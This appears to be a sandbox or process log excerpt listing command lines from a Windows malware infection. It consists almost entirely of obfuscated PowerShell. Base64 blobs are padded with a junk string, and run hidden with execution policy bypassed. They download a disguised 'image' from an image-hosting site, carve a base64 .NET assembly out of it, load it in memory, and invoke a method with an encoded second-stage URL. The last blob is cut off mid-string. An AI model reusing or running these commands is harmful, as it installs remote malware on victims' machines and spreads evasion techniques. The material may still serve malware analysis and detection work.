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BkdIOwShUWCcUzBkdIkShUWCcUzBkdIGUShUWCcUzBkdIbgBkShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdIE8ShUWCcUzBkdIZgShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdIRgBsShUWCcUzBkdIGEShUWCcUzBkdIZwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBzShUWCcUzBkdIHQShUWCcUzBkdIYQByShUWCcUzBkdIHQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIGUShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIwShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQBnShUWCcUzBkdIHQShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIrShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBGShUWCcUzBkdIGwShUWCcUzBkdIYQBnShUWCcUzBkdIC4ShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIOwShUWCcUzBkdIkShUWCcUzBkdIGIShUWCcUzBkdIYQBzShUWCcUzBkdIGUShUWCcUzBkdINgShUWCcUzBkdI0ShUWCcUzBkdIEwShUWCcUzBkdIZQBuShUWCcUzBkdIGcShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIPQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIZQBuShUWCcUzBkdIGQShUWCcUzBkdISQBuShUWCcUzBkdIGQShUWCcUzBkdIZQB4ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILQShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIcwB0ShUWCcUzBkdIGEShUWCcUzBkdIcgB0ShUWCcUzBkdIEkShUWCcUzBkdIbgBkShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGkShUWCcUzBkdIbQBhShUWCcUzBkdIGcShUWCcUzBkdIZQBUShUWCcUzBkdIGUShUWCcUzBkdIeShUWCcUzBkdIB0ShUWCcUzBkdIC4ShUWCcUzBkdIUwB1ShUWCcUzBkdIGIShUWCcUzBkdIcwB0ShUWCcUzBkdIHIShUWCcUzBkdIaQBuShUWCcUzBkdIGcShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHMShUWCcUzBkdIdShUWCcUzBkdIBhShUWCcUzBkdIHIShUWCcUzBkdIdShUWCcUzBkdIBJShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBlShUWCcUzBkdIHgShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdITShUWCcUzBkdIBlShUWCcUzBkdIG4ShUWCcUzBkdIZwB0ShUWCcUzBkdIGgShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIEMShUWCcUzBkdIbwBuShUWCcUzBkdIHYShUWCcUzBkdIZQByShUWCcUzBkdIHQShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdIRgByShUWCcUzBkdIG8ShUWCcUzBkdIbQBCShUWCcUzBkdIGEShUWCcUzBkdIcwBlShUWCcUzBkdIDYShUWCcUzBkdINShUWCcUzBkdIBTShUWCcUzBkdIHQShUWCcUzBkdIcgBpShUWCcUzBkdIG4ShUWCcUzBkdIZwShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIYgBhShUWCcUzBkdIHMShUWCcUzBkdIZQShUWCcUzBkdI2ShUWCcUzBkdIDQShUWCcUzBkdIQwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBsShUWCcUzBkdIG8ShUWCcUzBkdIYQBkShUWCcUzBkdIGUShUWCcUzBkdIZShUWCcUzBkdIBBShUWCcUzBkdIHMShUWCcUzBkdIcwBlShUWCcUzBkdIG0ShUWCcUzBkdIYgBsShUWCcUzBkdIHkShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdI9ShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIWwBTShUWCcUzBkdIHkShUWCcUzBkdIcwB0ShUWCcUzBkdIGUShUWCcUzBkdIbQShUWCcUzBkdIuShUWCcUzBkdIFIShUWCcUzBkdIZQBmShUWCcUzBkdIGwShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIaQBvShUWCcUzBkdIG4ShUWCcUzBkdILgBBShUWCcUzBkdIHMShUWCcUzBkdIcwBlShUWCcUzBkdIG0ShUWCcUzBkdIYgBsShUWCcUzBkdIHkShUWCcUzBkdIXQShUWCcUzBkdI6ShUWCcUzBkdIDoShUWCcUzBkdITShUWCcUzBkdIBvShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICQShUWCcUzBkdIYwBvShUWCcUzBkdIG0ShUWCcUzBkdIbQBhShUWCcUzBkdIG4ShUWCcUzBkdIZShUWCcUzBkdIBCShUWCcUzBkdIHkShUWCcUzBkdIdShUWCcUzBkdIBlShUWCcUzBkdIHMShUWCcUzBkdIKQShUWCcUzBkdI7ShUWCcUzBkdICQShUWCcUzBkdIdShUWCcUzBkdIB5ShUWCcUzBkdIHShUWCcUzBkdIShUWCcUzBkdIZQShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIGwShUWCcUzBkdIbwBhShUWCcUzBkdIGQShUWCcUzBkdIZQBkShUWCcUzBkdIEEShUWCcUzBkdIcwBzShUWCcUzBkdIGUShUWCcUzBkdIbQBiShUWCcUzBkdIGwShUWCcUzBkdIeQShUWCcUzBkdIuShUWCcUzBkdIEcShUWCcUzBkdIZQB0ShUWCcUzBkdIFQShUWCcUzBkdIeQBwShUWCcUzBkdIGUShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIEYShUWCcUzBkdIaQBiShUWCcUzBkdIGUShUWCcUzBkdIcgShUWCcUzBkdIuShUWCcUzBkdIEgShUWCcUzBkdIbwBtShUWCcUzBkdIGUShUWCcUzBkdIJwShUWCcUzBkdIpShUWCcUzBkdIDsShUWCcUzBkdIJShUWCcUzBkdIBtShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdIG8ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdID0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIHQShUWCcUzBkdIeQBwShUWCcUzBkdIGUShUWCcUzBkdILgBHShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBNShUWCcUzBkdIGUShUWCcUzBkdIdShUWCcUzBkdIBoShUWCcUzBkdIG8ShUWCcUzBkdIZShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICcShUWCcUzBkdIVgBBShUWCcUzBkdIEkShUWCcUzBkdIJwShUWCcUzBkdIpShUWCcUzBkdIC4ShUWCcUzBkdISQBuShUWCcUzBkdIHYShUWCcUzBkdIbwBrShUWCcUzBkdIGUShUWCcUzBkdIKShUWCcUzBkdIShUWCcUzBkdIkShUWCcUzBkdIG4ShUWCcUzBkdIdQBsShUWCcUzBkdIGwShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdIFsShUWCcUzBkdIbwBiShUWCcUzBkdIGoShUWCcUzBkdIZQBjShUWCcUzBkdIHQShUWCcUzBkdIWwBdShUWCcUzBkdIF0ShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIoShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBIShUWCcUzBkdIGgShUWCcUzBkdIMShUWCcUzBkdIBMShUWCcUzBkdIGoShUWCcUzBkdIUQShUWCcUzBkdIyShUWCcUzBkdIFoShUWCcUzBkdIWShUWCcUzBkdIBOShUWCcUzBkdIGgShUWCcUzBkdIWQBtShUWCcUzBkdIFYShUWCcUzBkdIcwBhShUWCcUzBkdIFcShUWCcUzBkdIWgBrShUWCcUzBkdIFoShUWCcUzBkdIWShUWCcUzBkdIBSShUWCcUzBkdIGgShUWCcUzBkdIWgBIShUWCcUzBkdIEIShUWCcUzBkdIMQBaShUWCcUzBkdIEcShUWCcUzBkdIbShUWCcUzBkdIB2ShUWCcUzBkdIGMShUWCcUzBkdIbQBSShUWCcUzBkdIGsShUWCcUzBkdIWgBXShUWCcUzBkdIDEShUWCcUzBkdIdShUWCcUzBkdIBZShUWCcUzBkdIFcShUWCcUzBkdIaShUWCcUzBkdIB2ShUWCcUzBkdIGIShUWCcUzBkdIUwShUWCcUzBkdI4ShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdITgB6ShUWCcUzBkdIEUShUWCcUzBkdIdQBOShUWCcUzBkdIHoShUWCcUzBkdITQB1ShUWCcUzBkdIE4ShUWCcUzBkdIRShUWCcUzBkdIBVShUWCcUzBkdIHkShUWCcUzBkdITShUWCcUzBkdIBqShUWCcUzBkdIFUShUWCcUzBkdINShUWCcUzBkdIBNShUWCcUzBkdIFMShUWCcUzBkdIOShUWCcUzBkdIB2ShUWCcUzBkdIE8ShUWCcUzBkdIbgBCShUWCcUzBkdIDShUWCcUzBkdIShUWCcUzBkdIZShUWCcUzBkdIBHShUWCcUzBkdIGcShUWCcUzBkdIPQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdIGQShUWCcUzBkdIZgBkShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGYShUWCcUzBkdIZShUWCcUzBkdIBmShUWCcUzBkdICcShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdIsShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdIJwBkShUWCcUzBkdIGEShUWCcUzBkdIZShUWCcUzBkdIBzShUWCcUzBkdIGEShUWCcUzBkdIJwShUWCcUzBkdIgShUWCcUzBkdICwShUWCcUzBkdIIShUWCcUzBkdIShUWCcUzBkdInShUWCcUzBkdIGQShUWCcUzBkdIZQShUWCcUzBkdInShUWCcUzBkdICShUWCcUzBkdIShUWCcUzBkdILShUWCcUzBkdIShUWCcUzBkdIgShUWCcUzBkdICcShUWCcUzBkdIYwB1ShUWCcUzBkdICcShUWCcUzBkdIKQShUWCcUzBkdIpShUWCcUzBkdIShUWCcUzBkdI==';$OWjuxd = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64string( $codigo.replace('ShUWCcUzBkdI','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD" |
cmdline | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://uploaddeimagens.com.br/images/004/634/676/original/rumpe.jpg?1697053529';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('Fiber.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('dHh0LjQ2ZXNhYmVsaWZkZXRhZHB1ZGlvcmRkZW1tYWhvbS80NzEuNzMuNDUyLjU4MS8vOnB0dGg=' , 'dfdfd' , 'dfdf' , 'dfdf' , 'dadsa' , 'de' , 'cu'))" |
cmdline | powershell -command "$Codigo = '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